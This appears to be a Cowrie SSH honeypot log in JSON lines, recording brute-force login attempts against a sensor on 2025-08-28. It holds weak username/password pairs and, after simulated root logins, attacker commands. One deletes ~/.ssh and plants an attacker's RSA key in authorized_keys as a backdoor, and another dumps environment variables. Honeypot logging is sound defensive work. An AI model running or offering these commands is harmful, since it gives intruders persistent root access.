{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60822,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba6e62b21825","protocol":"ssh","message":"New connection: 212.227.125.160:60822 (1.2.3.4:22) [session: ba6e62b21825]","sensor":"my-vps","timestamp":"2025-08-28T13:45:44.769771Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:45:44.770643Z","src_ip":"212.227.125.160","session":"ba6e62b21825"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:45:44.937207Z","src_ip":"212.227.125.160","session":"ba6e62b21825"}
{"eventid":"cowrie.login.failed","username":"developer","password":"12345","message":"login attempt [developer/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T13:45:45.724713Z","src_ip":"212.227.125.160","session":"ba6e62b21825"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:45:46.893684Z","src_ip":"212.227.125.160","session":"ba6e62b21825"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":36533,"dst_ip":"1.2.3.4","dst_port":22,"session":"da16e36dbd1d","protocol":"ssh","message":"New connection: 186.225.142.90:36533 (1.2.3.4:22) [session: da16e36dbd1d]","sensor":"my-vps","timestamp":"2025-08-28T13:45:56.522073Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:45:56.875010Z","src_ip":"186.225.142.90","session":"da16e36dbd1d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T13:45:56.875668Z","src_ip":"186.225.142.90","session":"da16e36dbd1d"}
{"eventid":"cowrie.login.success","username":"root","password":"100713","message":"login attempt [root/100713] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:45:58.405615Z","src_ip":"186.225.142.90","session":"da16e36dbd1d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:45:58.934841Z","src_ip":"186.225.142.90","session":"da16e36dbd1d"}
{"eventid":"cowrie.command.input","input":"env | head -10","message":"CMD: env | head -10","sensor":"my-vps","timestamp":"2025-08-28T13:45:58.935569Z","src_ip":"186.225.142.90","session":"da16e36dbd1d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","size":28,"shasum":"54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:45:59.250549Z","src_ip":"186.225.142.90","session":"da16e36dbd1d"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:45:59.390010Z","src_ip":"186.225.142.90","session":"da16e36dbd1d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53622,"dst_ip":"1.2.3.4","dst_port":22,"session":"bdd44a171d31","protocol":"ssh","message":"New connection: 212.227.125.160:53622 (1.2.3.4:22) [session: bdd44a171d31]","sensor":"my-vps","timestamp":"2025-08-28T13:46:06.207681Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:46:06.208373Z","src_ip":"212.227.125.160","session":"bdd44a171d31"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T13:46:06.268037Z","src_ip":"212.227.125.160","session":"bdd44a171d31"}
{"eventid":"cowrie.login.failed","username":"trading","password":"trading","message":"login attempt [trading/trading] failed","sensor":"my-vps","timestamp":"2025-08-28T13:46:06.448931Z","src_ip":"212.227.125.160","session":"bdd44a171d31"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:46:07.510556Z","src_ip":"212.227.125.160","session":"bdd44a171d31"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36738,"dst_ip":"1.2.3.4","dst_port":22,"session":"a44da792a34b","protocol":"ssh","message":"New connection: 212.227.235.229:36738 (1.2.3.4:22) [session: a44da792a34b]","sensor":"my-vps","timestamp":"2025-08-28T13:46:13.434394Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T13:46:13.435124Z","src_ip":"212.227.235.229","session":"a44da792a34b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T13:46:13.644437Z","src_ip":"212.227.235.229","session":"a44da792a34b"}
{"eventid":"cowrie.login.success","username":"root","password":"Huawei@2023","message":"login attempt [root/Huawei@2023] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:46:14.522645Z","src_ip":"212.227.235.229","session":"a44da792a34b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:46:14.957859Z","src_ip":"212.227.235.229","session":"a44da792a34b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T13:46:14.958684Z","src_ip":"212.227.235.229","session":"a44da792a34b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T13:46:14.959574Z","src_ip":"212.227.235.229","session":"a44da792a34b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:46:15.170083Z","src_ip":"212.227.235.229","session":"a44da792a34b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:46:16.045894Z","src_ip":"212.227.235.229","session":"a44da792a34b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T13:46:16.046548Z","src_ip":"212.227.235.229","session":"a44da792a34b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T13:46:16.257913Z","src_ip":"212.227.235.229","session":"a44da792a34b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:46:16.258891Z","src_ip":"212.227.235.229","session":"a44da792a34b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49990,"dst_ip":"1.2.3.4","dst_port":22,"session":"43ffca498cc1","protocol":"ssh","message":"New connection: 212.227.125.160:49990 (1.2.3.4:22) [session: 43ffca498cc1]","sensor":"my-vps","timestamp":"2025-08-28T13:46:19.486379Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:46:19.489175Z","src_ip":"212.227.125.160","session":"43ffca498cc1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:46:19.657156Z","src_ip":"212.227.125.160","session":"43ffca498cc1"}
{"eventid":"cowrie.login.failed","username":"developer","password":"12345678","message":"login attempt [developer/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T13:46:20.339642Z","src_ip":"212.227.125.160","session":"43ffca498cc1"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:46:21.512228Z","src_ip":"212.227.125.160","session":"43ffca498cc1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54376,"dst_ip":"1.2.3.4","dst_port":22,"session":"a29b5d16e339","protocol":"ssh","message":"New connection: 212.227.235.229:54376 (1.2.3.4:22) [session: a29b5d16e339]","sensor":"my-vps","timestamp":"2025-08-28T13:46:22.469334Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T13:46:22.470247Z","src_ip":"212.227.235.229","session":"a29b5d16e339"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T13:46:22.678943Z","src_ip":"212.227.235.229","session":"a29b5d16e339"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:46:23.558293Z","src_ip":"212.227.235.229","session":"a29b5d16e339"}
{"eventid":"cowrie.session.closed","duration":"10.3","message":"Connection lost after 10.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:46:23.768358Z","src_ip":"212.227.235.229","session":"a44da792a34b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:46:23.769199Z","src_ip":"212.227.235.229","session":"a29b5d16e339"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53798,"dst_ip":"1.2.3.4","dst_port":22,"session":"fbd5075b3153","protocol":"ssh","message":"New connection: 212.227.125.160:53798 (1.2.3.4:22) [session: fbd5075b3153]","sensor":"my-vps","timestamp":"2025-08-28T13:46:54.140181Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:46:54.147049Z","src_ip":"212.227.125.160","session":"fbd5075b3153"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:46:54.314473Z","src_ip":"212.227.125.160","session":"fbd5075b3153"}
{"eventid":"cowrie.login.failed","username":"developer","password":"qwerty","message":"login attempt [developer/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T13:46:55.014406Z","src_ip":"212.227.125.160","session":"fbd5075b3153"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:46:56.210546Z","src_ip":"212.227.125.160","session":"fbd5075b3153"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55832,"dst_ip":"1.2.3.4","dst_port":22,"session":"8db2989a582b","protocol":"ssh","message":"New connection: 212.227.125.160:55832 (1.2.3.4:22) [session: 8db2989a582b]","sensor":"my-vps","timestamp":"2025-08-28T13:47:28.821192Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:47:28.825059Z","src_ip":"212.227.125.160","session":"8db2989a582b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:47:28.989901Z","src_ip":"212.227.125.160","session":"8db2989a582b"}
{"eventid":"cowrie.login.failed","username":"developer","password":"123123","message":"login attempt [developer/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T13:47:29.666171Z","src_ip":"212.227.125.160","session":"8db2989a582b"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:47:30.837698Z","src_ip":"212.227.125.160","session":"8db2989a582b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46898,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1a3f4fb9997","protocol":"ssh","message":"New connection: 212.227.125.160:46898 (1.2.3.4:22) [session: c1a3f4fb9997]","sensor":"my-vps","timestamp":"2025-08-28T13:48:03.323873Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:48:03.325282Z","src_ip":"212.227.125.160","session":"c1a3f4fb9997"}
